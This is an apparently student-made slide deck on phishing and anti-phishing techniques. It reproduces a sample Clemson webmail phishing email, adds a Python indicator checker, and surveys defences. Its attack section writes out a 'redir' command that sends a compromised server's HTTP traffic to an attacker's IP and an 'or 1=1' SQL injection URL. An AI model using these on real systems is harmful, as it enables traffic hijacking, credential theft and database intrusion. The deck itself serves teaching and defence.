Phishing is a type of cybercrime where someone pretends to be a trusted source to trick people into giving away sensitive information. Anti-phishing is a way to prevent phishing attacks.
SachinMore788166
Sep 20, 2024
PHISHING AND ANTI-PHISHING TECHNIQUES
Sumanth, Sanath and Anil
CpSc 620
Email Message
Subject: CONFIRM YOUR ACCOUNT
Reply-To: “CLEMSON.EDU SUPPORT TEAM"
From: "CLEMSON.EDU SUPPORT TEAM“
Date: Tue, 1 Dec 2009 17:42:05 -0400
To: <"Undisclosed-Recipient:;"@iocaine.uits.clemson.edu>
Dear CLEMSON.EDU Webmail user,
This mail is to inform all our {CLEMSON.EDU } webmail users
that we will be maintaining and upgrading our website in a couple of
days from now to a new link. As a Subscriber you are required to click
on the link below and login to check if you have access to the new
link.
Click Here: www.webmail.clemson.edu
Failure to do this will immediately will render your email address
deactivated. Thank you for using CLEMSON.EDU.
CCIT SUPPORT TEAM
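The warning signs in the message above can be checked mechanically. The following Python sketch is an added example, not part of the original slides; the sender and Reply-To addresses and the link target are constructed placeholders (the slide does not show them), and the indicator names are hypothetical labels.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample modelled on the slide's message. The addresses and the
# link target are invented placeholders; the slide does not show them.
SAMPLE = '''\
Subject: CONFIRM YOUR ACCOUNT
Reply-To: "CLEMSON.EDU SUPPORT TEAM" <support@mailbox.example>
From: "CLEMSON.EDU SUPPORT TEAM" <notice@sender.example>
To: <"Undisclosed-Recipient:;"@iocaine.uits.clemson.edu>
Content-Type: text/html

<p>Failure to do this will immediately will render your email address deactivated.</p>
<a href="http://login.portal.example/webmail">www.webmail.clemson.edu</a>
'''

DOMAIN_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.I)
LINK_RE = re.compile(r'<a\s[^>]*href="https?://([^/"]+)[^"]*"[^>]*>(.*?)</a>', re.I | re.S)
URGENCY = ("deactivated", "suspended", "immediately", "confirm your account")

def same_org(claimed, actual):
    """True if `actual` is `claimed` or one of its subdomains."""
    claimed, actual = claimed.lower(), actual.lower()
    return actual == claimed or actual.endswith("." + claimed)

def phishing_indicators(raw):
    """Return the warning signs found in one raw RFC 5322 message."""
    msg = message_from_string(raw)
    body = msg.get_payload()
    found = []
    name, addr = parseaddr(msg.get("From", ""))
    from_dom = addr.rpartition("@")[2]
    # 1. Display name advertises a domain the real sender address is not in.
    if any(not same_org(d, from_dom) for d in DOMAIN_RE.findall(name)):
        found.append("display-name-domain-mismatch")
    # 2. Replies would go to a different domain than the sender's.
    reply_dom = parseaddr(msg.get("Reply-To", ""))[1].rpartition("@")[2]
    if reply_dom and reply_dom.lower() != from_dom.lower():
        found.append("reply-to-differs-from-sender")
    # 3. Bulk mail hiding its recipient list.
    if "undisclosed" in msg.get("To", "").lower():
        found.append("undisclosed-recipients")
    # 4. Pressure wording in subject or body.
    text = (msg.get("Subject", "") + " " + body).lower()
    if any(phrase in text for phrase in URGENCY):
        found.append("urgency-language")
    # 5. Link text shows one host while the href goes to another.
    for host, shown in LINK_RE.findall(body):
        if any(d.lower() != host.lower() for d in DOMAIN_RE.findall(shown)):
            found.append("link-text-domain-mismatch")
            break
    return found
```

Calling `phishing_indicators(SAMPLE)` reports all five signs; a message whose sender, Reply-To and link host agree and that carries no pressure wording returns an empty list.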
What is Phishing?
Phishing scams are typically fraudulent email messages or websites appearing as legitimate enterprises (e.g., your university, your Internet service provider, your bank).
These scams attempt to gather personal, financial and sensitive information.
Derivation of the word “phishing”.
How to phish?
Compromised Web servers – Email and IM
Port Redirection
Botnets
Key loggers
Compromised Web Servers
Attacker
Search for Vulnerable Web servers
Install phishing websites
Send Bulk Email
Compromised Web Server
Found!!
Port Redirection
Server is compromised and a program is loaded
All port 80 (i.e., HTTP) requests are redirected to the attacker’s server
Software known as ‘redir’
Execute the software using:
redir --lport=80 --laddr=<IP addr orig server> --cport=80 --caddr=<IP addr attacker>
Using Botnets
Botnets are computers infected by worms or Trojans and taken over surreptitiously by hackers and brought into networks to send spam, more viruses, or launch denial of service attacks.
Remotely controlled by the attacker.
SQL Injection attacks
Attacker
Server
http request with sql query
Attack the server with some queries to drop the tables:
http://localhost/products.asp?productId=0 or 1=1
SQL pattern matching: like '%admin%'
Keyloggers
Keyloggers are designed to monitor all the keystrokes
Hardware
Software
Modified to extract personal information
Current Statistics
Source: http://www.avira.com/
Anti-phishing
Ways:
Browser Capabilities
Desktop Agents
Token based
Digitally Signed Email
Domain Monitoring
Client Level
Server Level
Enterprise Level
Browser Capabilities
Disable pop ups
Disable Java runtime support
Prevent the storage of non-secure cookies
Ensure that downloads are checked by anti-virus software
E.g.: Mozilla Firefox Verification
Desktop Agents
Install Anti-virus software which can prevent phishing
Personal IDS
Firewall
Toolbars – Google, Yahoo, NetCraft
Token based Authentication
Digitally Signed Email
SMTP
Sender
Mail Server
Recipient
Sender’s Cert
CA Server
Validate Sender’s Certificate
Gmail - Verification
Domain Monitoring
Monitor the registration of Internet domains relating to their organisation and the expiry of corporate domains
Google - Safe Browsing API
www.phishtank.com
References
Honeynet Project – http://www.honeynet.org
The Phishing Guide - Understanding and Preventing Phishing attacks
Justice Department - http://www.justice.gov/
Statistics - http://www.avira.com/
Cross-site scripting attacks – http://www.wikipedia.org/
Images from PayPal, Gmail
Demo - Clemson Webmail – Only for Ethical Hacking
RSA Token Authentication - http://www.entrust.com